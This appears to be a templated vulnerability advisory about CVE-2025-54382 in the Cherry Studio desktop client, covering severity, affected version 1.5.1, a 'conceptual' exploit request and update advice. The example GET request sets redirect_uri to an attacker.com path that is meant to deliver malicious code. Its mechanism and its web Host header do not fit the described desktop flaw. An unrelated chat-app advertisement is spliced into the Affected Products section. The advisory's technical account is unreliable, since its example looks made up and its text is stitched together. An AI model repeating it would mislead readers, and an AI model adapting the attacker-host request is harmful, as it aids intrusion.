Overview
Cherry Studio, a desktop client that supports multiple LLM providers, has been identified as having a significant security flaw. This vulnerability, tracked as CVE-2025-54382, affects version 1.5.1 of Cherry Studio, and may potentially lead to system compromise or data leakage. This issue is of particular concern to organizations using Cherry Studio as a part of their workflow, as it can allow remote attackers to execute arbitrary code and gain unauthorized access to sensitive information.
Vulnerability Summary
CVE ID: CVE-2025-54382
Severity: Critical (9.6 CVSS Score)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System compromise or data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
Cherry Studio | 1.5.1
How the Exploit Works
This vulnerability arises due to Cherry Studio’s implicit trust in the oauth auth redirection endpoints when connecting to streamableHttp MCP servers. The critical flaw lies in the failure to properly sanitize the URL, which opens the door for malicious actors to inject arbitrary code. The attacker can exploit this vulnerability by sending a specially crafted URL to the user. Once clicked, this URL can trigger the execution of malicious code on the victim’s system.
Conceptual Example Code
A conceptual example of how this vulnerability might be exploited is shown below. This is a hypothetical HTTP request that an attacker could send to exploit the vulnerability:
GET /oauth/redirect?client_id=...&redirect_uri=http%3A%2F%2Fattacker.com%2Fmalicious_code HTTP/1.1
Host: vulnerable-cherry-studio.com
In this example, the attacker manipulates the `redirect_uri` parameter to point to their own server (`attacker.com`) where the malicious code resides. When this request is processed by Cherry Studio, it could trigger the execution of the included malicious code.
Recommendations
It is recommended that users of Cherry Studio immediately update to the patched version 1.5.2. In cases where immediate patching is not possible, implementing a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation. These systems can potentially detect and block attempts to exploit this vulnerability. However, these are not long-term solutions and the patch should be applied as soon as feasible. It is also recommended to follow best practices for secure coding to prevent such vulnerabilities from occurring in the first place.